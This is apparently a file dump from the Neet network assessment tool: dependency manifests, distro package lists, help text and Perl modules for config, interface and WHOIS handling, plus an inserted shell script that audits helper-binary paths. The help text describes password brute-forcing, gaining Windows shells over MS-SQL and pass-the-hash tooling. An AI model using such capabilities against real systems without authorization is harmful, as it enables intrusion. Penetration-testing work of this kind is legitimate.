component: TCPTraceroute
executable: tcptraceroute
download: http://michael.toren.net/code/tcptraceroute/
likelypaths: /usr/local/bin:/usr/bin:/usr/sbin:/usr/local/sbin
#versioncommand: tcptraceroute -v
#versionformat: \d+\.\d+
#recommended: 1.5

component: OpenVAS-LIBNASL
executable: openvas-nasl
download: http://www.openvas.org/index.html
likelypaths: /usr/local/bin:/usr/bin
#versioncommand: openvas-nasl -v
#versionformat: \d+\.\d+\.\d+
#recommended: 2.0.2

component: WGet
executable: wget
download: http://www.gnu.org/software/wget/
versioncommand: wget --version | grep Wget
versionformat: \d+\.\d+[\.\d+]{0,2}
likelypaths: /usr/bin:/usr/local/bin
recommended: 1.11.4

component: SSLScan
executable: sslscan
download: http://www.titania.co.uk
versioncommand: sslscan --version
versionformat: \d+\.\d+\.\d+
likelypaths: /usr/bin:/usr/local/bin
recommended: 1.8.0

component: Dig
executable: dig
versioncommand: dig -v 2>&1
versionformat: \d+\.\d+\.\d+
likelypaths: /usr/bin:/usr/local/bin
recommended: 9.5.1

component: RPCClient
executable: rpcclient
download: http://www.samba.org/samba/
versioncommand: rpcclient -V
versionformat: \d+\.\d+\.\d+
likelypaths: /usr/bin:/usr/local/bin
recommended: 3.2.5

component: Net
executable: net
download: http://www.samba.org/samba/
versioncommand: net -V
versionformat: \d+\.\d+\.\d+
likelypaths: /usr/bin:/usr/local/bin
recommended: 3.2.5

component: Net-SNMP
download: http://net-snmp.sourceforge.net/
executable: snmpwalk
versioncommand: snmpwalk -V 2>&1
versionformat: \d+\.\d+\.\d+[\.\d+]{0,}
likelypaths: /usr/bin:/usr/local/bin
recommended: 5.4.1

component: Ruby
download: http://www.ruby-lang.org/en/downloads/
executable: ruby
versioncommand: ruby -v
versionformat: \d+\.\d+\.\d+
likelypaths: /usr/bin:/usr/local/bin
recommended: 1.8.7

component: Java
download: http://www.java.com/en/download/linux_manual.jsp
executable: java
likelypaths: /usr/bin:/usr/local/bin

component: LDAP Tools
download: http://www.openldap.org/
executable: ldapsearch
likelypaths: /usr/bin:/usr/local/bin

# CPAN MODULES

component: Net-ARP
perlmodule: Net::ARP

component: DBD-Sybase
perlmodule: DBD::Sybase

component: NetAddr-IP
perlmodule: NetAddr::IP
critical: yes

# Will build this anyway
#component: Net-PcapUtils
#perlmodule: Net::PcapUtils

component: DBI
perlmodule: DBI

component: Net-RawIP
perlmodule: Net::RawIP

component: XML-Parser
perlmodule: XML::Parser
critical: yes

component: Term-ReadKey
perlmodule: Term::ReadKey
critical: yes

component: XML-Twig
perlmodule: XML::Twig
critical: yes

component: Net-Pcap
perlmodule: Net::Pcap

component: IO-Socket-SSL
perlmodule: IO::Socket::SSL

component: NetPacket-Ethernet
perlmodule: NetPacket::Ethernet

component: DBD-SQLite
perlmodule: DBD::SQLite

--------------------------------------------------------------------------------
/content/install/githubVersion:
--------------------------------------------------------------------------------
#!/usr/bin/perl -w

# Takes a GitHub neet repo name, and returns the version information that's in the MASTER branch.

use strict;

my $repo=$ARGV[0];
my $testAgainst=$ARGV[1];
if (!$repo || (index($repo,"neet") != 0) ) {
    print STDERR "Usage: $0 []\n";
    exit 1;
}

my $version;
my $URI="https://api.github.com/repos/jonnyhightower/$repo/releases";
my @data=`wget "$URI" -q -O - 2>&1`;
for my $line (@data){
    next if (index($line,"tag_name\":")<0);
    $line =~ s/\r//g;
    $line =~ s/^[\s\S]+:\s+"(\d+\.\d+\.\d+)",[\s\S]+$/$1/;
    next if ($line !~ /^\d+\.\d+\.\d+$/);
    if ($testAgainst && ($testAgainst =~ /^\d+\.\d+\.\d+$/)){
        my @latest=split "\\.", $line;
        my @installed=split "\\.", $testAgainst;
        my $updateAvailable=1;
        if ($latest[0] > $installed[0]){
            $updateAvailable=1;
        } elsif ($latest[0] < $installed[0]){
            $updateAvailable=0;
        } else {
            if ($latest[1] > $installed[1]){
                $updateAvailable=1;
            } elsif ($latest[1] < $installed[1]){
                $updateAvailable=0;
            } else {
                if ($latest[2] > $installed[2]){
                    $updateAvailable=1;
                } else {
                    $updateAvailable=0;
                }
            }
        }

        if ($updateAvailable){
            print "$line\n";
            exit 0;
        } else {
            exit 0;
        }
    } else {
        print "$line\n";
        exit 0;
    }
}
exit 1;

--------------------------------------------------------------------------------
/content/install/locations:
--------------------------------------------------------------------------------
nmap=/usr/bin/nmap
tcptraceroute=/usr/local/bin/tcptraceroute
openvas-nasl=/usr/local/bin/openvas-nasl
medusa=/usr/bin/medusa
wget=/usr/bin/wget
sslscan=/usr/bin/sslscan
dig=/usr/bin/dig
rpcclient=/usr/bin/rpcclient
net=/usr/bin/net
snmpwalk=/usr/bin/snmpwalk
ruby=/usr/bin/ruby
java=/usr/bin/java
ldapsearch=/usr/bin/ldapsearch
--------------------------------------------------------------------------------
/content/install/messages.dat:
--------------------------------------------------------------------------------
::Nmap:critical
Nmap is the core port-scanning engine and as such, it is a critical component.

::Nmap:recommended
Nmap performs a number of important tasks, such as service identification and
a number of vulnerability checks. It is important to have the latest version
detection fingerprints and scripting engine in order to get the best out of
Neet.

::TCPTraceroute:recommended
TCPTraceroute is used by the topology scanning module.

::Amap:recommended
Amap is used to identify services which the Nmap service identification module
has failed to identify accurately.

::OpenVAS-LIBNASL:recommended
OpenVAS NASL is an open-source project which forked from the Nessus 2 development
when Nessus 3.x ceased to be open source. Whilst the Neet discovery engine is not
intended to replace vulnerability scanners such as Nessus, it uses OpenVAS LIBNASL
to determine the presence of serious vulnerabilities which Neet is capable of
exploiting.

::Medusa:recommended
Medusa is used for brute-force-guessing passwords for a number of authentication
mechanisms, including MySQL, MSSQL, Windows and SSH. It has replaced THC Hydra,
which was used in older versions of Neet but proved to be less reliable.

::Bannergrab:recommended
Bannergrab is used to obtain banner information from remote services. The discovery
engine compares this banner information with known signatures in order to determine
which services are listening on open ports.

::Dig:recommended
Dig is a powerful tool for investigating DNS.

::RPCClient:recommended
RPCClient is a part of the Samba suite, and is a tool for executing client-side
RPC functions. It is used extensively by the discovery engine to enumerate data
from Windows and Samba servers.

::Net:recommended
Net is a part of the Samba suite, and is used extensively by the discovery
engine to interact with Windows and Samba servers.

::Net-SNMP:recommended
Net-SNMP is used by the discovery engine to enumerate SNMP data from servers.
The discovery engine will not be able to dump SNMP MIBs without this tool set.

::Ruby:recommended
Ruby is a dynamic, open source programming language with a focus on simplicity
and productivity. It is used by the Metasploit Framework, which is used by the
exploitation module of the Pentest Power Console.

::Net-ARP:recommended
Net::ARP is used by fwdetect to determine which interfaces will forward packets. It
can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan
command-line tool will fetch the module and any of its dependencies for you directly
from the CPAN if you have Internet access, or install it from your distribution's
package repositories.

::Net-RawIP:recommended
Net::RawIP is used by fwdetect to determine which interfaces will forward packets. It
can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan
command-line tool will fetch the module and any of its dependencies for you directly
from the CPAN if you have Internet access, or install it from your distribution's
package repositories.

::DBD-Sybase:recommended
DBD-Sybase is used by Neet to create a Windows shell when connected to MS-SQL databases.
It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan
command-line tool will fetch the module and any of its dependencies for you directly
from the CPAN if you have Internet access, or install it from your distribution's
package repositories.

::DBI:recommended
DBI is used by Neet to create a Windows shell when connected to MS-SQL databases. It
is also used by the credential manager.
It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan
command-line tool will fetch the module and any of its dependencies for you directly
from the CPAN if you have Internet access, or install it from your distribution's
package repositories.

::NetAddr-IP:critical
NetAddr::IP is used by the discovery engine to determine which interface is
appropriate to use to route to each target. It is also used to perform address range
conversions. The discovery engine will not work without this core module.
It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan
command-line tool will fetch the module and any of its dependencies for you directly
from the CPAN if you have Internet access, or install it from your distribution's
package repositories.

::Net-Pcap:recommended
This module is required by the Net::PcapUtils module.
It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan
command-line tool will fetch the module and any of its dependencies for you directly
from the CPAN if you have Internet access, or install it from your distribution's
package repositories.

::Net-PcapUtils:recommended
This module is required by fwdetect to determine which interfaces will forward packets.
It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan
command-line tool will fetch the module and any of its dependencies for you directly
from the CPAN if you have Internet access.

::Term-ReadKey:critical
This module is required to provide user interaction.

::XML-Parser:critical
This module is required to parse the results of some test tools, including nmap.
It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan
command-line tool will fetch the module and any of its dependencies for you directly
from the CPAN if you have Internet access.

::XML-Twig:critical
This module is required to parse the results of some test tools, including nmap.
It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan
command-line tool will fetch the module and any of its dependencies for you directly
from the CPAN if you have Internet access.

::IO-Socket-SSL:recommended
This module is required for testing of some services which are accessed through SSL.
It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan
command-line tool will fetch the module and any of its dependencies for you directly
from the CPAN if you have Internet access, or install it from your distribution's
package repositories.

::DBD-SQLite:recommended
This module is required for the credential manager. If you don't have this module,
you'll see some ugly output while running Neet, and the various modules will not be
able to store and share credentials in a meaningful way.
It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan
command-line tool will fetch the module and any of its dependencies for you directly
from the CPAN if you have Internet access, or install it from your distribution's
package repositories.
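
The locations file above records, as name=/full/path lines, where checkdeps.pl found each helper program. The following added example (not part of the Neet source) audits a file in that layout, assuming the recorded paths are later executed with root privileges: it flags relative paths, missing or non-executable targets, a basename that differs from the recorded name, and files or parent directories writable by group or others. The function names, the verdict strings and the fixture built in a temporary directory are constructed for this example.

```sh
#!/bin/sh
# Audit a locations-style file (name=/absolute/path per line).

# audit_location NAME TARGET -> prints "ok" or a single reason
audit_location() {
    name=$1
    target=$2
    case $target in
        /*) ;;
        *) echo "relative-path"; return 0 ;;
    esac
    [ -f "$target" ] || { echo "missing"; return 0; }
    [ -x "$target" ] || { echo "not-executable"; return 0; }
    # checkdeps.pl writes "$executable=$path/$executable", so the
    # basename should always equal the recorded name.
    [ "${target##*/}" = "$name" ] || { echo "name-mismatch"; return 0; }
    # Group- or world-writable binary (symlinks are followed with -H).
    if [ -n "$(find -H "$target" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
        echo "writable-by-group-or-other"; return 0
    fi
    # World-writable parent directory without the sticky bit.
    dir=${target%/*}
    [ -n "$dir" ] || dir=/
    if [ -n "$(find -H "$dir" -prune -perm -002 ! -perm -1000 -print)" ]; then
        echo "dir-world-writable"; return 0
    fi
    echo ok
}

# audit_locations FILE -> prints "name: reason" for every entry that fails
audit_locations() {
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in
            ''|'#'*) continue ;;
        esac
        case $line in
            *=*) ;;
            *) echo "$line: malformed"; continue ;;
        esac
        entry=${line%%=*}
        verdict=$(audit_location "$entry" "${line#*=}")
        [ "$verdict" = ok ] || echo "$entry: $verdict"
    done < "$1"
    return 0
}

# make_fixture DIR -> builds constructed sample binaries and DIR/locations
make_fixture() {
    d=$1
    mkdir -p "$d/bin" "$d/open"
    chmod 755 "$d/bin"
    chmod 777 "$d/open"                  # world-writable, no sticky bit
    for f in bin/nmap bin/wget bin/dig open/net; do
        printf '#!/bin/sh\n' > "$d/$f"
    done
    chmod 755 "$d/bin/nmap" "$d/open/net"
    chmod 775 "$d/bin/wget"              # group-writable
    chmod 644 "$d/bin/dig"               # not executable
    cat > "$d/locations" <<EOF
# constructed sample in the name=path layout
nmap=$d/bin/nmap
wget=$d/bin/wget
dig=$d/bin/dig
sslscan=sslscan
ruby=$d/bin/ruby
net=$d/open/net
snmpwalk=$d/bin/nmap
EOF
}

demo() {
    tmp=$(mktemp -d) || return 1
    make_fixture "$tmp"
    audit_locations "$tmp/locations"
    rm -rf "$tmp"
}
demo
```

Against a real installation the file to check would be the locations file the installer wrote; an empty result means every entry passed.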
--------------------------------------------------------------------------------
/content/install/pkg/backtrack:
--------------------------------------------------------------------------------
cmake
flex
bison

libnet-arp-perl
libnet-ip-perl
libnetaddr-ip-perl
libterm-readkey-perl

libpcap0.8
libpcap-dev
libnet1-dev
libnet-pcap-perl
libglib2.0-dev
libgnutls26
libgnutls-dev
libgpgme11-dev
uuid-dev
libopenvasnasl2
libdbi-perl
libdbd-sqlite3-perl
libdbd-sybase-perl
libx11-protocol-perl

ldap-utils
medusa
ntpdate

--------------------------------------------------------------------------------
/content/install/pkg/debian:
--------------------------------------------------------------------------------
cmake
flex
bison

libnet-arp-perl
libnet-ip-perl
libnetaddr-ip-perl
libterm-readkey-perl
libnet-rawip-perl
libxml-parser-perl
libxml-twig-perl

smbclient
nfs-common

libssl-dev
libglib2.0-dev
libgnutls26
libgnutls-dev
libnet1-dev
libpcap0.8
libpcap-dev
libnet-pcap-perl
libnetpacket-perl
libnet-write-perl
libgpgme11-dev
uuid-dev
libdbi-perl
libdbd-sqlite3-perl
libdbd-sybase-perl
libx11-protocol-perl
libopenvasnasl2
libopenvasnasl2-dev

snmp
sslscan
nmap
ruby
ldap-utils
medusa
ntpdate

--------------------------------------------------------------------------------
/content/install/pkg/debian-8:
--------------------------------------------------------------------------------
cmake
flex
bison
make
autoconf

libnet-arp-perl
libnet-ip-perl
libnetaddr-ip-perl
libterm-readkey-perl
libnet-rawip-perl
libxml-parser-perl
libxml-twig-perl

smbclient
nfs-common

python-dev
libpopt0
libpopt-dev
libssh-dev
libhiredis-dev
libgcrypt20-dev
libcurl3
libcurl4-openssl-dev
libssl-dev
libglib2.0-dev
libgnutls-deb0-28
libgnutls28-dev
libnet1-dev
libpcap0.8
libpcap-dev
libnet-pcap-perl
libnetpacket-perl
libnet-write-perl
libgpgme11-dev
uuid-dev
libdbi-perl
libdbd-sqlite3-perl
libdbd-sybase-perl
libx11-protocol-perl

tcptraceroute
tcpdump

snmp
sslscan
nmap
ruby
ldap-utils
medusa
ntpdate

--------------------------------------------------------------------------------
/content/install/pkg/kali:
--------------------------------------------------------------------------------
cmake
flex
bison

libnet-arp-perl
libnet-ip-perl
libnetaddr-ip-perl
libterm-readkey-perl

libssl-dev
libglib2.0-dev
libgnutls26
libgnutls-dev
libnet1-dev
libpcap0.8
libpcap-dev
libnet-pcap-perl
libgpgme11-dev
uuid-dev
libdbi-perl
libdbd-sqlite3-perl
libdbd-sybase-perl
libx11-protocol-perl

ldap-utils
medusa
winexe
passing-the-hash
ntpdate

--------------------------------------------------------------------------------
/content/install/pkg/kali-1.0:
--------------------------------------------------------------------------------
cmake
flex
bison

libnet-arp-perl
libnet-ip-perl
libnetaddr-ip-perl
libterm-readkey-perl

libssl-dev
libglib2.0-dev
libgnutls26
libgnutls-dev
libnet1-dev
libpcap0.8
libpcap-dev
libnet-pcap-perl
libgpgme11-dev
uuid-dev
libdbi-perl
libdbd-sqlite3-perl
libdbd-sybase-perl
libx11-protocol-perl

ldap-utils
medusa
winexe
passing-the-hash
ntpdate

--------------------------------------------------------------------------------
/content/install/pkg/kali-kali-rolling:
--------------------------------------------------------------------------------
cmake
flex
bison
make
autoconf

libnet-arp-perl
libnet-ip-perl
libnetaddr-ip-perl
libterm-readkey-perl
libnet-rawip-perl
libxml-parser-perl
libxml-twig-perl

smbclient
nfs-common

python-dev
libpopt0
libpopt-dev
libssh-dev
libhiredis-dev
libgcrypt20-dev
libcurl3
libcurl4-openssl-dev
libssl-dev
libglib2.0-dev
libgnutlsxx28
libgnutls28-dev
libnet1-dev
libpcap0.8
libpcap-dev
libnet-pcap-perl
libnetpacket-perl
libnet-write-perl
libgpgme11-dev
uuid-dev
libdbi-perl
libdbd-sqlite3-perl
libdbd-sybase-perl
libx11-protocol-perl

tcptraceroute
tcpdump

snmp
sslscan
nmap
ruby
ldap-utils
medusa
ntpdate

--------------------------------------------------------------------------------
/content/install/pkg/linuxmint-17:
--------------------------------------------------------------------------------
cmake
flex
bison
make
autoconf

libnet-arp-perl
libnet-ip-perl
libnetaddr-ip-perl
libterm-readkey-perl
libnet-rawip-perl
libxml-parser-perl
libxml-twig-perl

smbclient
nfs-common

libpopt0
libpopt-dev
libssh-dev
libhiredis-dev
libgcrypt20-dev

libssl-dev
libglib2.0-dev
libgnutls26
libgnutls-dev
libnet1-dev
libpcap0.8
libpcap-dev
libnet-pcap-perl
libnetpacket-perl
libnet-write-perl
libgpgme11-dev
uuid-dev
libdbi-perl
libdbd-sqlite3-perl
libdbd-sybase-perl
libx11-protocol-perl
libopenvasnasl2
libopenvasnasl2-dev
libcurl4-openssl-dev

tcptraceroute
tcpdump

snmp
sslscan
nmap
ruby
ldap-utils
medusa
ntpdate
--------------------------------------------------------------------------------
/content/install/pkg/linuxmint-17.1:
--------------------------------------------------------------------------------
linuxmint-17
--------------------------------------------------------------------------------
/content/install/pkg/linuxmint-17.2:
--------------------------------------------------------------------------------
linuxmint-17
--------------------------------------------------------------------------------
/content/install/pkg/linuxmint-17.3:
--------------------------------------------------------------------------------
linuxmint-17
--------------------------------------------------------------------------------
/content/install/pkg/linuxmint-18:
--------------------------------------------------------------------------------
cmake
flex
bison
make
autoconf

libnet-arp-perl
libnet-ip-perl
libnetaddr-ip-perl
libterm-readkey-perl
libnet-rawip-perl
libxml-parser-perl
libxml-twig-perl

smbclient
nfs-common

libpopt0
libpopt-dev
libssh-dev
libhiredis-dev
libgcrypt20-dev

libssl-dev
libglib2.0-dev
libgnutls26
libgnutls-dev
libnet1-dev
libpcap0.8
libpcap-dev
libnet-pcap-perl
libnetpacket-perl
libnet-write-perl
libgpgme11-dev
uuid-dev
libdbi-perl
libdbd-sqlite3-perl
libdbd-sybase-perl
libx11-protocol-perl
libcurl4-openssl-dev

tcptraceroute
tcpdump

snmp
sslscan
nmap
ruby
ldap-utils
medusa
ntpdate
--------------------------------------------------------------------------------
/content/install/pkg/ubuntu-12.04:
-------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | 5 | libnet-arp-perl 6 | libnet-ip-perl 7 | libnetaddr-ip-perl 8 | libterm-readkey-perl 9 | libnet-rawip-perl 10 | libxml-parser-perl 11 | libxml-twig-perl 12 | 13 | smbclient 14 | nfs-common 15 | 16 | libssl-dev 17 | libglib2.0-dev 18 | libgnutls26 19 | libgnutls-dev 20 | libnet1-dev 21 | libpcap0.8 22 | libpcap-dev 23 | libnet-pcap-perl 24 | libnetpacket-perl 25 | libnet-write-perl 26 | libgpgme11-dev 27 | uuid-dev 28 | libdbi-perl 29 | libdbd-sqlite3-perl 30 | libdbd-sybase-perl 31 | libx11-protocol-perl 32 | libopenvasnasl2 33 | libopenvasnasl2-dev 34 | libcurl-dev 35 | 36 | snmp 37 | sslscan 38 | nmap 39 | ruby 40 | ldap-utils 41 | medusa 42 | ntpdate 43 | 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /content/install/pkg/ubuntu-14.04: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | 5 | libnet-arp-perl 6 | libnet-ip-perl 7 | libnetaddr-ip-perl 8 | libterm-readkey-perl 9 | libnet-rawip-perl 10 | libxml-parser-perl 11 | libxml-twig-perl 12 | 13 | smbclient 14 | nfs-common 15 | 16 | libssl-dev 17 | libglib2.0-dev 18 | libgnutls26 19 | libgnutls-dev 20 | libnet1-dev 21 | libpcap0.8 22 | libpcap-dev 23 | libnet-pcap-perl 24 | libnetpacket-perl 25 | libnet-write-perl 26 | libgpgme11-dev 27 | uuid-dev 28 | libdbi-perl 29 | libdbd-sqlite3-perl 30 | libdbd-sybase-perl 31 | libx11-protocol-perl 32 | libopenvasnasl2 33 | libopenvasnasl2-dev 34 | libcurl-dev 35 | 36 | snmp 37 | sslscan 38 | nmap 39 | ruby 40 | ldap-utils 41 | medusa 42 | ntpdate 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /content/install/pkg/ubuntu-16.04: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | 5 | libnet-arp-perl 6 | 
libnet-ip-perl
libnetaddr-ip-perl
libterm-readkey-perl
libnet-rawip-perl
libxml-parser-perl
libxml-twig-perl

smbclient
nfs-common

libssl-dev
libglib2.0-dev
libgnutls26
libgnutls-dev
libnet1-dev
libpcap0.8
libpcap-dev
libnet-pcap-perl
libnetpacket-perl
libnet-write-perl
libgpgme11-dev
uuid-dev
libdbi-perl
libdbd-sqlite3-perl
libdbd-sybase-perl
libx11-protocol-perl
libcurl-dev

snmp
sslscan
nmap
ruby
ldap-utils
medusa
ntpdate

--------------------------------------------------------------------------------
/content/main/JR/Files/Config.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

package Config;
use Fcntl ':flock';

# Config file parsing for Neet
# Jonathan Roach
# April 2006
# Version

sub new {
  my $self=shift;
  my $file=shift();
  my @contents;
  my %Config;
  my $F;
  if ($file && -f "$file" && open($F,"$file")){
    until (eof $F){
      my $line=readline (*$F);
      next if (($line !~ /\S/) || ($line =~ /^[\s]{0,}\#/));
      chomp $line;
      push @contents,$line
    }
    close $F;
  } else {
    return 0;
  }
  $Config{'File'}=$file;
  $Config{'Contents'}=\@contents;

  my $object=\%Config;
  bless $object, $self;
  return $object;
}

sub Split {
  my $self=shift();
  my $line=shift();
  return 0 if (!$line || $line !~ /=/);
  my $sp=index($line,"=");
  my $key=substr($line,0,$sp);
  my $value=substr($line,$sp+1,length($line)-($sp+1));
  return ($key,$value);
}

sub ListKeys {
  my $self=shift();
  my @keys;
  for my $line (@{$$self{'Contents'}}){
    my ($k,$v)=$self->Split($line);
    push @keys, $k;
  }
  return @keys;
}

sub GetVal {
  my $self=shift();
  my $key=shift();
  for my $line (@{$$self{'Contents'}}){
    my ($k,$v)=$self->Split($line);
    if ("$k" eq "$key"){
      return $v;
    }
  }
  return undef;
}

sub GetClassValues {
  my $self=shift();
  my $class=shift();
  my @values;
  for my $line (@{$$self{'Contents'}}){
    my ($k,$v)=$self->Split($line);
    if ($k =~ /^$class/){
      push @values, $v;
    }
  }
  return @values;
}

sub GetClassKeys {
  my $self=shift();
  my $class=shift();
  my @keys;
  for my $line (@{$$self{'Contents'}}){
    my ($k,$v)=$self->Split($line);
    if ($k =~ /^$class/){
      $k =~
        s/$class//;
      push @keys, $k;
    }
  }
  return @keys;
}

sub UpdateValueInFile {
  my $self=shift();
  my $class=shift();
  my $value=shift();
  my (@oldfile,@newfile,$changed);
  if (defined($class) && defined($value) && open(FH,$$self{'File'})){
    flock(FH,LOCK_EX);
    @oldfile=<FH>;
    flock(FH,LOCK_UN);
    close FH;
    for my $line (@oldfile){
      if ($line =~ /^${class}=/){
        $line = "${class}=$value\n";
        $changed=1;
      }
      push @newfile, $line;
    }
    $#oldfile=-1;

    if ($changed && open(FH,">$$self{'File'}")){
      flock(FH,LOCK_EX);
      print FH @newfile;
      flock(FH,LOCK_UN);
      close FH;
      $#newfile=-1;
      return 1;
    }
  }
  return 0;
}

1;

--------------------------------------------------------------------------------
/content/main/JR/NetUtils/NetUtils.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

# This is JR::NetUtils.pm

sub isPortSpec {
  my $spec=shift();
  return 1 if ($spec =~ /^\d+[-,]??\d+$/);
  return 0;
}

sub isIPSpec {
  my $spec=shift();
  my $status=1;
  if ($spec !~ /\//){
    # Absolute range
    my @octets=split "\\.", $spec;
    return 0 if ($#octets != 3);
    for my $octet (@octets){
      my ($a,$b)=split("-",$octet);
      if ($b){
        $status=0 if ($b !~ /^\d{1,3}$/);
        $status=0 if (($b > 255) || ($b <= $a));
      } else {
        $status=0 if ($octet =~ /-/);
      }
      $status=0 if ($a !~ /^\d{1,3}$/);
      $status=0 if ($a > 255);
    }
  } else {
    # CIDR notation
    my ($net,$mask)=split "/", $spec;
    $status=is_ipspec($net);
    if ($status){
      if (!is_ipspec($mask)){
        if (!(($mask =~ /^\d+$/) && ($mask > 0) && ($mask < 33))){
          $status=0;
        }
      }
    }
  }
  return $status;
}

sub isIPRange {
  my $range=shift();
  if ($range =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\-\d{1,3}$/){
    return 1;
  } else {
    return 0;
  }
}

sub isInterface {
  my $interface=shift();
  return 0 if (!$interface || $interface =~ /\W/ || $interface !~ /\d/);
  my $rc=system("/sbin/ifconfig $interface >/dev/null 2>&1");
  $rc = $rc>>8;
  if ($rc == 0){
    return 1;
  }
  return 0;
}

sub InterfaceIP {
  my $Interface=shift();
  return 0 if (!$Interface);
  return 0 if (!isInterface($Interface));
  my @ifconfig=`/sbin/ip addr show`;
  my ($address,$mask,$broadcast,$mac,$object)=interfaceInfo ($Interface,@ifconfig);
  return $address;
}

sub interfaceIP {
  my $interface=shift();
  return undef if (!isInterface($interface));
  my @ifconfig=`/sbin/ip addr show`;
  my
    ($address,$mask,$broadcast,$mac,$object)=interfaceInfo ($interface,@ifconfig);
  return $address;
}

sub interfaceMask {
  my $interface=shift();
  return undef if (!isInterface($interface));
  my @ifconfig=`/sbin/ip addr show`;
  my ($address,$mask,$broadcast,$mac,$object)=interfaceInfo ($interface,@ifconfig);
  return $mask;
}

sub interfaceInfo {
  my $interface=shift();
  my @ifdata=@_;
  return undef if ($#ifdata < 6);

  if ("$interface" eq "list"){
    my @interfaces;
    for my $line (@ifdata){
      next if ($line !~ /^\d+:\s/);
      next if ($line =~ /state DOWN/);
      $line =~ m/\d:\s(\S+):\s+\<*/;
      push @interfaces, $1;
    }
    return @interfaces;
  }

  my $thisInterface=0;
  my ($address,$mask,$broadcast,$mac,$object);

  for my $line (@ifdata){
    if ($line =~ /\s$interface:\s/){
      $thisInterface=1;
      return undef if ($line =~ /state DOWN/);
      next;
    }
    if ($thisInterface){
      if ($line =~ /^\s{0,}inet\s/){
        if ($line =~ /\speer\s/){
          # Point to point link - No MAC, 32-bit address
          $line =~ m/^\s{0,}inet\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s+peer\s+[\S\s]+$/;
          $address=$1 . "/32";
          $broadcast=$1;
          $mac="";
        } else {
          # Standard network type addressing
          $line =~ m/^\s{0,}inet\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/\d{1,2})\s+brd\s+(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s[\S\s]+$/;
          $address=$1;
          $broadcast=$2;
        }
        next;
      }
      if ($line =~ /^\s{0,}link\/ether\s/){
        $line =~ m/^\s{0,}link\/ether\s(\S+)\s+brd\s+[\S\s]+/;
        $mac=$1;
        next;
      }
      if ($line =~ /^\d+:/){
        $thisInterface=0;
        last;
      }
    }
  }

  if ($address){
    $object=NetAddr::IP->new($address);
    $mask=$object->mask();
    $address=$object->addr();
  }

  return ($address,$mask,$broadcast,$mac,$object);
}


1;

--------------------------------------------------------------------------------
/content/main/JR/NetUtils/WHOIS.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

package JR::NetUtils::WHOIS;

sub new {
  use IO::Socket::INET;
  my $pkg=shift();
  my %object;
  @{$object{'sources'}}=("whois.ripe.net","whois.arin.net","whois.apnic.net","whois.lacnic.net","whois.afrinic.net");
  my $self=\%object;
  bless $self, $pkg;
  return $self;
}

sub lookup {
  my $self=shift();
  my $record=shift();
  for my $source (@{$$self{'sources'}}){
    my $res=$self->query_server($source,$record);
    return 1 if ($res);
  }
  return 0;
}


sub data {
  my $self=shift();
  return @{$$self{'data'}};
}
sub source {
  my $self=shift();
  return $$self{'source'};
}

sub query_server {
  my $self=shift();
  my $source=shift();
  my $record=shift();
  my $success=0;
  my @data;
  my $sock=IO::Socket::INET->new( 'Proto' => 'tcp', 'PeerAddr' => "$source",
    'PeerPort' => '43');
  if ($sock){
    print $sock "$record\n";
    @data=<$sock>;
    close $sock;
    for my $line (@data){
      if ($line =~ /^ReferralServer:\s/){
        my ($j,$s) = split (" ", $line, 2);
        $s =~ s/whois:\/\/([\S]+)\W/$1/;
        $$self{'referral'}=$s;
        $success=0;
        last;
      }
      if ($line =~ /^person:\s/ || $line =~ /^origin:\s/ || $line =~ /^NameServer:\s/ || $line =~ /^OrgName:\s/){
        $success=1;
      }

    }
    if ($success){
